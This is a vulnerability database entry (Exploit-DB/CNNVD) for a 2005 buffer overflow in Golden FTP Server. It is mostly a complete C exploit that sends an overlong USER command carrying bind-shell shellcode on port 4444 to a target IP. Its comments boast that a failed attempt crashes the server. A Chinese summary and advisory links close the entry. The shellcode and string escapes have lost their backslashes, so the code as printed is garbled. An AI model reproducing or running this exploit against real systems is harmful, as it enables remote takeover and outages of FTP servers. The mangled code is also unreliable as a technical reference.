https://www.exploit-db.com/exploits/969
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-675

GoldenFTPServer1.92中存在缓冲区溢出，远程攻击者因此可以通过长的用户命令来执行任意代码。

/*
 golden ftp 2.52.0.0 remote r00t exploit
/
 remote r00t exploit binds 4444 port on remote machine.
/ tested on: winxp sp0 rus

/ simple stack overflow in golden ftpd.
 if retaddr isn't right, ftpd will crash, and admin will be in big shit
/ 'coz ftpd won't start later ;)

/ code to be executed, admin must restart or shutdown ftpd... then ftpd will execute eviLDuDe'Z c0de )

/ gr33tz: choix, nekd0, xtix, crash-x, coki, rave, antiq, xoce, shi, 'em, lp, spekterX, edisan, c0wboy
 ilja, esDee, blackhatz.inf0, sk3w
/ p.s }:+ EvILduDe
 (c) uKt research '04/'05
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>

#define RETADDR 0x77F510B0

char shellcode[]= // binds 4444 port
"xd9xEExd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xb1xbe"
"x94x1dx83xebxfcxe2xf4x4dx56xc2x1dxb1xbexc7x48xe7"
"xe9x1fx71x95xa6x1fx58x8dx35xc0x18xc9xbfx7ex96xfb"
"xa6x1fx47x91xbfx7fxfex83xf7x1fx29x3axbfx7ax2cx4e"
"x42xa5xddx1dx86x74x69xb6x7fx5bx10xb0x79x7fxefx8a"
"xc2xb0x09xc4x5fx1fx47x95xbfx7fx7bx3axb2xdfx96xeb"
"xa2x95xf6x3axbax1fx1cx59x55x96x2cx71xe1xcax40xea"
"x7cx9cx1dxefxd4xa4x44xd5x35x8dx96xeaxb2x1fx46xad"
"x35x8fx96xeaxb6xc7x75x3fxf0x9axf1x4ex68x1dxdax30"
"x52x94x1cxb1xbexc3x4bxe2x37x71xf5x96xbex94x1dx21"
"xbfx94x1dx07xa7x8cxfax15xa7xe4xf4x54xf7x12x54x15"
"xa4xe4xdax15x13xbaxf4x68xb7x61xb0x7ax53x68x26xe6"
"xedxa6x42x82x8cx94x46x3cxf5xb4x4cx4ex69x1dxc2x38"
"x7dx19x68xa5xd4x93x44xe0xedx6bx29x3ex41xc1x19xe8"
"x37x90x93x53x4cxbfx3axe5x41xa3xe2xe4x8exa5xddxe1"
"xeexc4x4dxf1xeexd4x4dx4exebxb8x94x76x8fx4fx4exe2"
"xd6x96x1dxa0xe2x1dxfdxdbxaexc4x4ax4exebxb0x4exe6"
"x41xc1x35xe2xeaxc3xe2xe4x9ex1dxdaxd9xfdxd9x59xb1"
"x37x77x9ax4bx8fx54x90xcdx9ax38x77xa4xe7x67xb6x36"
"x44x17xf1xe5x78xd0x39xa1xfaxf2xdaxf5x9axa8x1cxb0"
"x37xe8x39xf9x37xe8x39xfdx37xe8x39xe1x33xd0x39xa1"
"xeaxc4x4cxe0xefxd5x4cxf8xefxc5x4exe0x41xe1x1dxd9"
"xccx6axaexa7x41xc1x19x4ex6ex1dxfbx4excbx94x75x1c"
"x67x91xd3x4exebx90x94x72xd4x6bxe2x87x41x47xe2xc4"
"xbexfcxedx3bxbaxcbxe2xe4xbaxa5xc6xe2x41x44x1d";

int main ( int argc, char *argv[] )
{
WSADATA wsa;
SOCKET sock;
char data[6667], evil[7776];
struct sockaddr_in addr;

printf("nn >> Golden FTP Server Pro 2.52.0.0 Remote Root Exploit <<n :: by darkeagle [unl0ck] ::n >> http://unl0ck.org <<nn");

WSAStartup(MAKEWORD(2,0), &wsa);

if ( argc < 3 )
{
printf(" >usage: %s <ip> <port>nn", argv[0]);
exit(0);
}

printf(" [*] ip: %s, port: %dn", argv[1], atoi(argv[2]));

addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
addr.sin_addr.s_addr = inet_addr(argv[1]);

sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

memset(data, 0x00, sizeof(data));
memset(evil, 0x00, sizeof(evil));
memset(data, 0x55, 372);

*(long*)&data[332] = RETADDR;
memcpy(data, &shellcode, sizeof(shellcode));

printf(" [`] connecting...n");

if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) > 0 ) { printf(" [+] connectedn"); } else { exit(0); }

sprintf(evil, "USER %srnPASSrn", data);

Sleep(1000);
send(sock, evil, strlen(evil), 1);

printf(" [+] send. w8ing while ftpd will reboot...nn");

closesocket(sock);
WSACleanup();

return 0;

}

// milw0rm.com [2005-04-29]

来源:BID
名称:12704
链接:http://www.securityfocus.com/bid/12704
来源:BUGTRAQ
名称:20050302GoldenFtpserver1.29UsernameremoteBufferOverflow
链接:http://www.securityfocus.com/archive/1/391987
来源:VUPEN
名称:ADV-2006-4936
链接:http://www.frsirt.com/english/advisories/2006/4936
来源:SECUNIA
名称:23323
链接:http://secunia.com/advisories/23323
来源:MISC
链接:http://retrogod.altervista.org/golden_heap.html